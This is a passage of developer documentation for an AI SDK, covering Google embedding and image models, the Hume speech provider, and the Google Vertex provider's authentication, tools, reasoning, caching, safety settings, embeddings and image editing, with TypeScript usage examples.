  - RETRIEVAL_DOCUMENT: Optimized for document retrieval.
  - RETRIEVAL_QUERY: Optimized for query-based retrieval.
  - QUESTION_ANSWERING: Optimized for answering questions.
  - FACT_VERIFICATION: Optimized for verifying factual information.
  - CODE_RETRIEVAL_QUERY: Optimized for retrieving code blocks based on natural language queries.
- content: array
  Optional. Per-value multimodal content parts for embedding non-text content (images, video, PDF, audio). Each entry corresponds to the embedding value at the same index; its parts are merged with the text value in the request. Use null for entries that are text-only. The array length must match the number of values being embedded. Each non-null entry is an array of parts, where each part can be either { text: string } or { inlineData: { mimeType: string, data: string } }. Supported by gemini-embedding-2-preview.
Model Capabilities
| Model | Default Dimensions | Custom Dimensions | Multimodal |
|---|---|---|---|
| gemini-embedding-001 | 3072 | | |
| gemini-embedding-2-preview | 3072 | | |
Image Models
You can create image models that call the Google Generative AI API using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
The Google provider supports two types of image models:
- Imagen models: Dedicated image generation models using the
:predictAPI - Gemini image models: Multimodal language models with image output capabilities using the
:generateContentAPI
Imagen Models
Imagen models are dedicated image generation models.
import { google } from '@ai-sdk/google';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: google.image('imagen-4.0-generate-001'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
Further configuration can be done using Google provider options. You can validate the provider options using the GoogleImageModelOptions type.
import { google } from '@ai-sdk/google';
import { GoogleImageModelOptions } from '@ai-sdk/google';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: google.image('imagen-4.0-generate-001'),
providerOptions: {
google: {
personGeneration: 'dont_allow',
} satisfies GoogleImageModelOptions,
},
// ...
});
The following provider options are available for Imagen models:
- personGeneration allow_adult | allow_all | dont_allow
  Whether to allow person generation. Defaults to allow_adult.
Imagen Model Capabilities
| Model | Aspect Ratios |
|---|---|
| imagen-4.0-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-4.0-ultra-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-4.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
Gemini Image Models
Gemini image models (e.g. gemini-2.5-flash-image) are technically multimodal output language models, but they can be used with the generateImage() function for a simpler image generation experience. Internally, the provider calls the language model API with responseModalities: ['IMAGE'].
import { google } from '@ai-sdk/google';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: google.image('gemini-2.5-flash-image'),
prompt: 'A photorealistic image of a cat wearing a wizard hat',
aspectRatio: '1:1',
});
Gemini image models also support image editing by providing input images:
import { google } from '@ai-sdk/google';
import { generateImage } from 'ai';
import fs from 'node:fs';
const sourceImage = fs.readFileSync('./cat.png');
const { image } = await generateImage({
model: google.image('gemini-2.5-flash-image'),
prompt: {
text: 'Add a small wizard hat to this cat',
images: [sourceImage],
},
});
You can also use URLs for input images:
import { google } from '@ai-sdk/google';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: google.image('gemini-2.5-flash-image'),
prompt: {
text: 'Add a small wizard hat to this cat',
images: ['https://example.com/cat.png'],
},
});
Gemini Image Model Capabilities
| Model | Image Generation | Image Editing | Aspect Ratios |
|---|---|---|---|
| gemini-2.5-flash-image | | | 1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9 |
| gemini-3-pro-image-preview | | | 1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9 |
| gemini-3.1-flash-image-preview | | | 1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9 |
title: Hume
description: Learn how to use the Hume provider for the AI SDK.
Hume Provider
The Hume provider contains support for the Hume text-to-speech (TTS) API.
Setup
The Hume provider is available in the @ai-sdk/hume module. You can install it with:
pnpm add @ai-sdk/hume
Provider Instance
You can import the default provider instance hume from @ai-sdk/hume:
import { hume } from '@ai-sdk/hume';
If you need a customized setup, you can import createHume from @ai-sdk/hume and create a provider instance with your settings:
import { createHume } from '@ai-sdk/hume';
const hume = createHume({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the Hume provider instance:
- apiKey string
  API key that is being sent using the X-Hume-Api-Key header. It defaults to the HUME_API_KEY environment variable.
- headers Record<string,string>
  Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Speech Models
You can create models that call the Hume speech API
using the .speech() factory method.
const model = hume.speech();
You can pass standard speech generation options like voice, speed, instructions, and outputFormat:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { hume } from '@ai-sdk/hume';
const result = await generateSpeech({
model: hume.speech(),
text: 'Hello, world!',
voice: 'd8ab67c6-953d-4bd8-9370-8fa53a0f1453',
speed: 1.0,
instructions: 'Speak in a friendly, conversational tone.',
outputFormat: 'mp3',
});
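To save the result, you can write the audio bytes to a file (a minimal sketch; the generated audio exposes its raw bytes as uint8Array):
import fs from 'node:fs';
fs.writeFileSync('speech.mp3', result.audio.uint8Array); // raw mp3 bytes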
Supported Parameters
- text string (required)
  The text to convert to speech.
- voice string
  The voice ID to use for the generated audio. Defaults to 'd8ab67c6-953d-4bd8-9370-8fa53a0f1453'.
- speed number
  Speech rate multiplier.
- instructions string
  Description or instructions for how the text should be spoken.
- outputFormat string
  The audio format to generate. Supported values: 'mp3', 'pcm', 'wav'. Defaults to 'mp3'.
Provider Options
You can pass additional provider-specific options using the providerOptions argument:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { hume } from '@ai-sdk/hume';
import { type HumeSpeechModelOptions } from '@ai-sdk/hume';
const result = await generateSpeech({
model: hume.speech(),
text: 'Hello, world!',
providerOptions: {
hume: {
context: {
generationId: 'previous-generation-id',
},
} satisfies HumeSpeechModelOptions,
},
});
The following provider options are available:
- context object
  Context for the speech synthesis request. Can be either:
  - { generationId: string } - ID of a previously generated speech synthesis to use as context.
  - { utterances: Utterance[] } - An array of utterance objects for context, where each utterance has:
    - text string (required) - The text content.
    - description string - Instructions for how the text should be spoken.
    - speed number - Speech rate multiplier.
    - trailingSilence number - Duration of silence to add after the utterance in seconds.
    - voice object - Voice configuration, either { id: string, provider?: 'HUME_AI' | 'CUSTOM_VOICE' } or { name: string, provider?: 'HUME_AI' | 'CUSTOM_VOICE' }.
Model Capabilities
| Model | Instructions | Speed | Output Formats |
|---|---|---|---|
| default | | | mp3, pcm, wav |
title: Google Vertex AI
description: Learn how to use the Google Vertex AI provider.
Google Vertex Provider
The Google Vertex provider for the AI SDK contains language model support for the Google Vertex AI APIs. This includes support for Google's Gemini models, Anthropic's Claude partner models, and MaaS (Model as a Service) open models.
Setup
The Google Vertex and Google Vertex Anthropic providers are both available in the @ai-sdk/google-vertex module. You can install it with:
pnpm add @ai-sdk/google-vertex
Google Vertex Provider Usage
The Google Vertex provider instance is used to create model instances that call the Vertex AI API. The models available with this provider include Google's Gemini models. If you're looking to use Anthropic's Claude models, see the Google Vertex Anthropic Provider section below.
Provider Instance
You can import the default provider instance vertex from @ai-sdk/google-vertex:
import { vertex } from '@ai-sdk/google-vertex';
If you need a customized setup, you can import createVertex from @ai-sdk/google-vertex and create a provider instance with your settings:
import { createVertex } from '@ai-sdk/google-vertex';
const vertex = createVertex({
project: 'my-project', // optional
location: 'us-central1', // optional
});
Google Vertex supports multiple authentication methods depending on your runtime environment and requirements.
Node.js Runtime
The Node.js runtime is the default runtime supported by the AI SDK. It supports all standard Google Cloud authentication options through the google-auth-library. Typical use involves setting a path to a JSON credentials file in the GOOGLE_APPLICATION_CREDENTIALS environment variable. The credentials file can be obtained from the Google Cloud Console.
If you want to customize the Google authentication options you can pass them as options to the createVertex function, for example:
import { createVertex } from '@ai-sdk/google-vertex';
const vertex = createVertex({
googleAuthOptions: {
credentials: {
client_email: 'my-email',
private_key: 'my-private-key',
},
},
});
Optional Provider Settings
You can use the following optional settings to customize the provider instance:
- project string
  The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
- location string
  The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
- googleAuthOptions object
  Optional. The authentication options used by the Google Auth Library. See also the GoogleAuthOptions interface.
  - authClient object - An AuthClient to use.
  - keyFilename string - Path to a .json, .pem, or .p12 key file.
  - keyFile string - Path to a .json, .pem, or .p12 key file.
  - credentials object - Object containing client_email and private_key properties, or the external account client options.
  - clientOptions object - Options object passed to the constructor of the client.
  - scopes string | string[] - Required scopes for the desired API request.
  - projectId string - Your project ID.
  - universeDomain string - The default service domain for a given Cloud universe.
- headers Resolvable<Record<string, string | undefined>>
  Headers to include in the requests. Can be provided in multiple formats:
  - A record of header key-value pairs: Record<string, string | undefined>
  - A function that returns headers: () => Record<string, string | undefined>
  - An async function that returns headers: async () => Record<string, string | undefined>
  - A promise that resolves to headers: Promise<Record<string, string | undefined>>
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- baseURL string
  Optional. Base URL for the Google Vertex API calls, e.g. to use proxy servers. By default, it is constructed using the location and project: https://${location}-aiplatform.googleapis.com/v1/projects/${project}/locations/${location}/publishers/google
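As an illustration, here is a minimal sketch that combines custom headers with a logging fetch wrapper (the header name and log output are hypothetical):
import { createVertex } from '@ai-sdk/google-vertex';
const vertex = createVertex({
  project: 'my-project',
  location: 'us-central1',
  headers: { 'X-Custom-Header': 'value' }, // hypothetical custom header
  fetch: async (input, init) => {
    console.log('Vertex request:', input); // log every outgoing request
    return fetch(input, init);
  },
});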
Edge Runtime
Edge runtimes (like Vercel Edge Functions and Cloudflare Workers) are lightweight JavaScript environments that run closer to users at the network edge. They only provide a subset of the standard Node.js APIs. For example, direct file system access is not available, and many Node.js-specific libraries (including the standard Google Auth library) are not compatible.
The Edge runtime version of the Google Vertex provider supports Google's Application Default Credentials through environment variables. The values can be obtained from a JSON credentials file downloaded from the Google Cloud Console.
You can import the default provider instance vertex from @ai-sdk/google-vertex/edge:
import { vertex } from '@ai-sdk/google-vertex/edge';
If you need a customized setup, you can import createVertex from @ai-sdk/google-vertex/edge and create a provider instance with your settings:
import { createVertex } from '@ai-sdk/google-vertex/edge';
const vertex = createVertex({
project: 'my-project', // optional
location: 'us-central1', // optional
});
For Edge runtime authentication, you'll need to set these environment variables from your Google Default Application Credentials JSON file:
- GOOGLE_CLIENT_EMAIL
- GOOGLE_PRIVATE_KEY
- GOOGLE_PRIVATE_KEY_ID (optional)
These values can be obtained from a service account JSON file from the Google Cloud Console.
Optional Provider Settings
You can use the following optional settings to customize the provider instance:
- project string
  The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
- location string
  The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
- googleCredentials object
  Optional. The credentials used by the Edge provider for authentication. These credentials are typically set through environment variables and are derived from a service account JSON file.
  - clientEmail string - The client email from the service account JSON file. Defaults to the contents of the GOOGLE_CLIENT_EMAIL environment variable.
  - privateKey string - The private key from the service account JSON file. Defaults to the contents of the GOOGLE_PRIVATE_KEY environment variable.
  - privateKeyId string - The private key ID from the service account JSON file (optional). Defaults to the contents of the GOOGLE_PRIVATE_KEY_ID environment variable.
- headers Resolvable<Record<string, string | undefined>>
  Headers to include in the requests. Can be provided in multiple formats:
  - A record of header key-value pairs: Record<string, string | undefined>
  - A function that returns headers: () => Record<string, string | undefined>
  - An async function that returns headers: async () => Record<string, string | undefined>
  - A promise that resolves to headers: Promise<Record<string, string | undefined>>
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Express Mode
Express mode provides a simplified authentication method using an API key instead of OAuth or service account credentials. When using express mode, the project and location settings are not required.
import { createVertex } from '@ai-sdk/google-vertex';
const vertex = createVertex({
apiKey: process.env.GOOGLE_VERTEX_API_KEY,
});
Optional Provider Settings
- apiKey string
  The API key for Google Vertex AI. When provided, the provider uses express mode with API key authentication instead of OAuth. It uses the GOOGLE_VERTEX_API_KEY environment variable by default.
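Once configured, the express-mode instance works like any other provider instance; a minimal sketch continuing the snippet above:
import { generateText } from 'ai';
const { text } = await generateText({
  model: vertex('gemini-2.5-flash'),
  prompt: 'Write a haiku about the Pacific Ocean.',
});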
Language Models
You can create models that call the Vertex API using the provider instance.
The first argument is the model id, e.g. gemini-2.5-pro.
const model = vertex('gemini-2.5-pro');
Google Vertex models also support some model-specific settings that are not part of the standard call settings. You can pass them as an options argument:
import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const model = vertex('gemini-2.5-pro');
await generateText({
model,
providerOptions: {
vertex: {
safetySettings: [
{
category: 'HARM_CATEGORY_UNSPECIFIED',
threshold: 'BLOCK_LOW_AND_ABOVE',
},
],
} satisfies GoogleLanguageModelOptions,
},
});
The following optional provider options are available for Google Vertex models:
- cachedContent string
  Optional. The name of the cached content used as context to serve the prediction. Format: projects/{project}/locations/{location}/cachedContents/{cachedContent}
- structuredOutputs boolean
  Optional. Enable structured output. Default is true.
  This is useful when the JSON Schema contains elements that are not supported by the OpenAPI schema version that Google Vertex uses. You can use this to disable structured outputs if you need to.
  See Troubleshooting: Schema Limitations for more details.
- safetySettings Array<{ category: string; threshold: string }>
  Optional. Safety settings for the model.
  - category string
    The category of the safety setting. Can be one of the following:
    - HARM_CATEGORY_UNSPECIFIED
    - HARM_CATEGORY_HATE_SPEECH
    - HARM_CATEGORY_DANGEROUS_CONTENT
    - HARM_CATEGORY_HARASSMENT
    - HARM_CATEGORY_SEXUALLY_EXPLICIT
    - HARM_CATEGORY_CIVIC_INTEGRITY
  - threshold string
    The threshold of the safety setting. Can be one of the following:
    - HARM_BLOCK_THRESHOLD_UNSPECIFIED
    - BLOCK_LOW_AND_ABOVE
    - BLOCK_MEDIUM_AND_ABOVE
    - BLOCK_ONLY_HIGH
    - BLOCK_NONE
- audioTimestamp boolean
  Optional. Enables timestamp understanding for audio files. Defaults to false.
  This is useful for generating transcripts with accurate timestamps. Consult Google's Documentation for usage details.
- labels object
  Optional. Defines labels used in billing reports. Consult Google's Documentation for usage details.
- streamFunctionCallArguments boolean
  Optional. When set to true, function call arguments will be streamed incrementally in streaming responses. This enables tool-input-delta events to arrive as the model generates function call arguments, reducing perceived latency for tool calls. Defaults to false. Only supported on the Vertex AI API (not the Gemini API) with Gemini 3+ models. Consult Google's Documentation for details.
You can use Google Vertex language models to generate text with the generateText function:
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const { text } = await generateText({
model: vertex('gemini-2.5-pro'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Google Vertex language models can also be used in the streamText function
(see AI SDK Core).
Code Execution
With Code Execution, certain Gemini models on Vertex AI can generate and execute Python code. This allows the model to perform calculations, data manipulation, and other programmatic tasks to enhance its responses.
You can enable code execution by adding the code_execution tool to your request.
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const result = await generateText({
model: vertex('gemini-2.5-pro'),
tools: { code_execution: vertex.tools.codeExecution({}) },
prompt:
'Use python to calculate 20th fibonacci number. Then find the nearest palindrome to it.',
});
The response will contain tool-call and tool-result parts for the executed code.
URL Context
URL Context allows Gemini models to retrieve and analyze content from URLs. Supported models: Gemini 2.5 Flash-Lite, 2.5 Pro, 2.5 Flash, 2.0 Flash.
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const result = await generateText({
model: vertex('gemini-2.5-pro'),
tools: { url_context: vertex.tools.urlContext({}) },
prompt: 'What are the key points from https://example.com/article?',
});
Google Search
Google Search enables Gemini models to access real-time web information. Supported models: Gemini 2.5 Flash-Lite, 2.5 Flash, 2.0 Flash, 2.5 Pro.
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const result = await generateText({
model: vertex('gemini-2.5-pro'),
tools: { google_search: vertex.tools.googleSearch({}) },
prompt: 'What are the latest developments in AI?',
});
Enterprise Web Search
Enterprise Web Search provides grounding using a compliance-focused web index designed for highly-regulated industries such as finance, healthcare, and the public sector. Unlike standard Google Search grounding, Enterprise Web Search does not log customer data and supports VPC service controls. Supported models: Gemini 2.0 and newer.
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const result = await generateText({
model: vertex('gemini-2.5-flash'),
tools: {
enterprise_web_search: vertex.tools.enterpriseWebSearch({}),
},
prompt: 'What are the latest FDA regulations for clinical trials?',
});
Google Maps
Google Maps grounding enables Gemini models to access Google Maps data for location-aware responses. Supported models: Gemini 2.5 Flash-Lite, 2.5 Flash, 2.0 Flash, 2.5 Pro, 3.0 Pro.
import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const result = await generateText({
model: vertex('gemini-2.5-flash'),
tools: {
google_maps: vertex.tools.googleMaps({}),
},
providerOptions: {
vertex: {
retrievalConfig: {
latLng: { latitude: 34.090199, longitude: -117.881081 },
},
} satisfies GoogleLanguageModelOptions,
},
prompt: 'What are the best Italian restaurants nearby?',
});
The optional retrievalConfig.latLng provider option provides location context for queries about nearby places. This configuration applies to any grounding tools that support location context.
Streaming Function Call Arguments
For Gemini 3 Pro and later models on Vertex AI, you can stream function call
arguments as they are generated by setting streamFunctionCallArguments to
true. This reduces perceived latency when functions need to be called, as
tool-input-delta events arrive incrementally instead of waiting for the
complete arguments. This option defaults to false.
import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { streamText } from 'ai';
import { z } from 'zod';
const result = streamText({
model: vertex('gemini-3.1-pro-preview'),
prompt: 'What is the weather in Boston and San Francisco?',
tools: {
getWeather: {
description: 'Get the current weather in a given location',
inputSchema: z.object({
location: z.string().describe('City name'),
}),
},
},
providerOptions: {
vertex: {
streamFunctionCallArguments: true,
} satisfies GoogleLanguageModelOptions,
},
});
for await (const part of result.fullStream) {
switch (part.type) {
case 'tool-input-start':
console.log(`Tool call started: ${part.toolName}`);
break;
case 'tool-input-delta':
process.stdout.write(part.delta);
break;
case 'tool-call':
console.log(`Tool call complete: ${part.toolName}`, part.input);
break;
}
}
Reasoning (Thinking Tokens)
Google Vertex AI, through its support for Gemini models, can also emit "thinking" tokens, representing the model's reasoning process. The AI SDK exposes these as reasoning information.
To enable thinking tokens for compatible Gemini models via Vertex, set includeThoughts: true in the thinkingConfig provider option. These options are passed through providerOptions.vertex:
import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText, streamText } from 'ai';
// For generateText:
const { text, reasoningText, reasoning } = await generateText({
model: vertex('gemini-2.0-flash-001'), // Or other supported model via Vertex
providerOptions: {
vertex: {
thinkingConfig: {
includeThoughts: true,
// thinkingBudget: 2048, // Optional
},
} satisfies GoogleLanguageModelOptions,
},
prompt: 'Explain quantum computing in simple terms.',
});
console.log('Reasoning:', reasoningText);
console.log('Reasoning Details:', reasoning);
console.log('Final Text:', text);
// For streamText:
const result = streamText({
model: vertex('gemini-2.0-flash-001'), // Or other supported model via Vertex
providerOptions: {
vertex: {
thinkingConfig: {
includeThoughts: true,
// thinkingBudget: 2048, // Optional
},
} satisfies GoogleLanguageModelOptions,
},
prompt: 'Explain quantum computing in simple terms.',
});
for await (const part of result.fullStream) {
if (part.type === 'reasoning') {
process.stdout.write(`THOUGHT: ${part.textDelta}\n`);
} else if (part.type === 'text-delta') {
process.stdout.write(part.textDelta);
}
}
When includeThoughts is true, parts of the API response marked with thought: true will be processed as reasoning.
- In generateText, these contribute to the reasoningText (string) and reasoning (array) fields.
- In streamText, these are emitted as reasoning stream parts.
File Inputs
The Google Vertex provider supports file inputs, e.g. PDF files.
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
import fs from 'node:fs';
const { text } = await generateText({
model: vertex('gemini-2.5-pro'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
},
],
},
],
});
See File Parts for details on how to use files in prompts.
Cached Content
Google Vertex AI supports both explicit and implicit caching to help reduce costs on repetitive content.
Implicit Caching
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
// Structure prompts with consistent content at the beginning
const baseContext =
'You are a cooking assistant with expertise in Italian cuisine. Here are 1000 lasagna recipes for reference...';
const { text: veggieLasagna } = await generateText({
model: vertex('gemini-2.5-pro'),
prompt: `${baseContext}\n\nWrite a vegetarian lasagna recipe for 4 people.`,
});
// Second request with same prefix - eligible for cache hit
const { text: meatLasagna, providerMetadata } = await generateText({
model: vertex('gemini-2.5-pro'),
prompt: `${baseContext}\n\nWrite a meat lasagna recipe for 12 people.`,
});
// Check cached token count in usage metadata
console.log('Cached tokens:', providerMetadata.vertex);
// e.g.
// {
// groundingMetadata: null,
// safetyRatings: null,
// usageMetadata: {
// cachedContentTokenCount: 2027,
// thoughtsTokenCount: 702,
// promptTokenCount: 2152,
// candidatesTokenCount: 710,
// totalTokenCount: 3564
// }
// }
Explicit Caching
You can use explicit caching with Gemini models. See the Vertex AI context caching documentation to check if caching is supported for your model.
First, create a cache using the Google GenAI SDK with Vertex mode enabled:
import { GoogleGenAI } from '@google/genai';
const ai = new GoogleGenAI({
vertexai: true,
project: process.env.GOOGLE_VERTEX_PROJECT,
location: process.env.GOOGLE_VERTEX_LOCATION,
});
const model = 'gemini-2.5-pro';
// Create a cache with the content you want to reuse
const cache = await ai.caches.create({
model,
config: {
contents: [
{
role: 'user',
parts: [{ text: '1000 Lasagna Recipes...' }],
},
],
ttl: '300s', // Cache expires after 5 minutes
},
});
console.log('Cache created:', cache.name);
// e.g. projects/my-project/locations/us-central1/cachedContents/abc123
Then use the cache with the AI SDK:
import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text: veggieLasagnaRecipe } = await generateText({
model: vertex('gemini-2.5-pro'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
providerOptions: {
vertex: {
cachedContent: cache.name,
} satisfies GoogleLanguageModelOptions,
},
});
const { text: meatLasagnaRecipe } = await generateText({
model: vertex('gemini-2.5-pro'),
prompt: 'Write a meat lasagna recipe for 12 people.',
providerOptions: {
vertex: {
cachedContent: cache.name,
} satisfies GoogleLanguageModelOptions,
},
});
Safety Ratings
The safety ratings provide insight into the safety of the model's response. See Google Vertex AI documentation on configuring safety filters.
Example response excerpt:
{
"safetyRatings": [
{
"category": "HARM_CATEGORY_HATE_SPEECH",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.11027937,
"severity": "HARM_SEVERITY_LOW",
"severityScore": 0.28487435
},
{
"category": "HARM_CATEGORY_DANGEROUS_CONTENT",
"probability": "HIGH",
"blocked": true,
"probabilityScore": 0.95422274,
"severity": "HARM_SEVERITY_MEDIUM",
"severityScore": 0.43398145
},
{
"category": "HARM_CATEGORY_HARASSMENT",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.11085559,
"severity": "HARM_SEVERITY_NEGLIGIBLE",
"severityScore": 0.19027223
},
{
"category": "HARM_CATEGORY_SEXUALLY_EXPLICIT",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.22901751,
"severity": "HARM_SEVERITY_NEGLIGIBLE",
"severityScore": 0.09089675
}
]
}
For more details, see the Google Vertex AI documentation on grounding with Google Search.
Troubleshooting
Schema Limitations
The Google Vertex API uses a subset of the OpenAPI 3.0 schema, which does not support features such as unions. The errors that you get in this case look like this:
GenerateContentRequest.generation_config.response_schema.properties[occupation].type: must be specified
By default, structured outputs are enabled (and for tool calling they are required). You can disable structured outputs for object generation as a workaround:
import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: vertex('gemini-2.5-pro'),
providerOptions: {
vertex: {
structuredOutputs: false,
} satisfies GoogleLanguageModelOptions,
},
output: Output.object({
schema: z.object({
name: z.string(),
age: z.number(),
contact: z.union([
z.object({
type: z.literal('email'),
value: z.string(),
}),
z.object({
type: z.literal('phone'),
value: z.string(),
}),
]),
}),
}),
prompt: 'Generate an example person for testing.',
});
The following Zod features are known to not work with Google Vertex:
- z.union
- z.record
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| gemini-3-pro-preview | | | | |
| gemini-2.5-pro | | | | |
| gemini-2.5-flash | | | | |
| gemini-2.0-flash-001 | | | | |
Embedding Models
You can create models that call the Google Vertex AI embeddings API using the .embeddingModel() factory method:
const model = vertex.embeddingModel('text-embedding-005');
Google Vertex AI embedding models support additional settings. You can pass them as an options argument:
import {
vertex,
type GoogleVertexEmbeddingModelOptions,
} from '@ai-sdk/google-vertex';
import { embed } from 'ai';
const model = vertex.embeddingModel('text-embedding-005');
const { embedding } = await embed({
model,
value: 'sunny day at the beach',
providerOptions: {
vertex: {
outputDimensionality: 512, // optional, number of dimensions for the embedding
taskType: 'SEMANTIC_SIMILARITY', // optional, specifies the task type for generating embeddings
autoTruncate: false, // optional
} satisfies GoogleVertexEmbeddingModelOptions,
},
});
The following optional provider options are available for Google Vertex AI embedding models:
- outputDimensionality: number
  Optional reduced dimension for the output embedding. If set, excessive values in the output embedding are truncated from the end.
- taskType: string
  Optional. Specifies the task type for generating embeddings. Supported task types include:
  - SEMANTIC_SIMILARITY: Optimized for text similarity.
  - CLASSIFICATION: Optimized for text classification.
  - CLUSTERING: Optimized for clustering texts based on similarity.
  - RETRIEVAL_DOCUMENT: Optimized for document retrieval.
  - RETRIEVAL_QUERY: Optimized for query-based retrieval.
  - QUESTION_ANSWERING: Optimized for answering questions.
  - FACT_VERIFICATION: Optimized for verifying factual information.
  - CODE_RETRIEVAL_QUERY: Optimized for retrieving code blocks based on natural language queries.
- title: string
  Optional. The title of the document being embedded. This helps the model produce better embeddings by providing additional context. Only valid when taskType is set to 'RETRIEVAL_DOCUMENT'.
- autoTruncate: boolean
  Optional. When set to true, input text will be truncated if it exceeds the maximum length. When set to false, an error is returned if the input text is too long. Defaults to true.
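For batches, embedMany works the same way; a minimal sketch:
import { vertex } from '@ai-sdk/google-vertex';
import { embedMany } from 'ai';
const { embeddings } = await embedMany({
  model: vertex.embeddingModel('text-embedding-005'),
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
});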
Model Capabilities
| Model | Max Values Per Call | Parallel Calls | Multimodal |
|---|---|---|---|
| text-embedding-005 | 2048 | | |
| gemini-embedding-2-preview | 2048 | | |
Image Models
You can create image models using the .image() factory method. The Google Vertex provider supports both Imagen and Gemini image models. For more on image generation with the AI SDK see generateImage().
Imagen Models
Imagen models generate images using the Imagen on Vertex AI API.
import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: vertex.image('imagen-4.0-generate-001'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
Further configuration can be done using Google Vertex provider options. You can validate the provider options using the GoogleVertexImageModelOptions type.
import { vertex } from '@ai-sdk/google-vertex';
import { GoogleVertexImageModelOptions } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: vertex.image('imagen-4.0-generate-001'),
providerOptions: {
vertex: {
negativePrompt: 'pixelated, blurry, low-quality',
} satisfies GoogleVertexImageModelOptions,
},
// ...
});
The following provider options are available:
- negativePrompt string
  A description of what to discourage in the generated images.
- personGeneration allow_adult | allow_all | dont_allow
  Whether to allow person generation. Defaults to allow_adult.
- safetySetting block_low_and_above | block_medium_and_above | block_only_high | block_none
  Whether to block unsafe content. Defaults to block_medium_and_above.
- addWatermark boolean
  Whether to add an invisible watermark to the generated images. Defaults to true.
- storageUri string
  Cloud Storage URI to store the generated images.
Additional information about the images can be retrieved from the Google Vertex provider metadata.
import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
const { image, providerMetadata } = await generateImage({
model: vertex.image('imagen-4.0-generate-001'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
console.log(
`Revised prompt: ${providerMetadata.vertex.images[0].revisedPrompt}`,
);
Image Editing
Google Vertex Imagen models support image editing through inpainting, outpainting, and other edit modes. Pass input images via prompt.images and optionally a mask via prompt.mask.
Inpainting (Insert Objects)
Insert or replace objects in specific areas using a mask:
import { vertex, GoogleVertexImageModelOptions } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
import fs from 'fs';
const image = fs.readFileSync('./input-image.png');
const mask = fs.readFileSync('./mask.png'); // White = edit area
const { images } = await generateImage({
model: vertex.image('imagen-3.0-capability-001'),
prompt: {
text: 'A sunlit indoor lounge area with a pool containing a flamingo',
images: [image],
mask,
},
providerOptions: {
vertex: {
edit: {
baseSteps: 50,
mode: 'EDIT_MODE_INPAINT_INSERTION',
maskMode: 'MASK_MODE_USER_PROVIDED',
maskDilation: 0.01,
},
} satisfies GoogleVertexImageModelOptions,
},
});
Outpainting (Extend Image)
Extend an image beyond its original boundaries:
import { vertex, GoogleVertexImageModelOptions } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
import fs from 'fs';
const image = fs.readFileSync('./input-image.png');
const mask = fs.readFileSync('./outpaint-mask.png'); // White = extend area
const { images } = await generateImage({
